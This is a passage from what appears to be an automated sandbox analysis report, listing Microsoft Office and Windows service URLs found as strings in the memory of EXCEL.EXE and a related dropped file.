Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechId
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidH
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://graph.ppe.windows.net
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://graph.ppe.windows.net/3
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://graph.windows.net
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://graph.windows.net/e
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://graph.windows.net/lS
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://hubble.officeapps.live.com:.
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetrye
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?MBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1rev=
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: EXCEL.EXE, 00000001.00000002.754486893.00000000129F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://incidents.diagnosticssdf.office.comej
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookq
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
Source: EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmp String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechTd
Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://lifecycle.office.com
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
Source: EXCEL.EXE, 00000001.00000003.620552414.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603146434.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.756814057.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599650458.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619064533.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603553946.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617608577.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565349896.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660803627.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.739719715.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622560891.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738569509.0000000015B7F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623207550.0000000015B7F000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
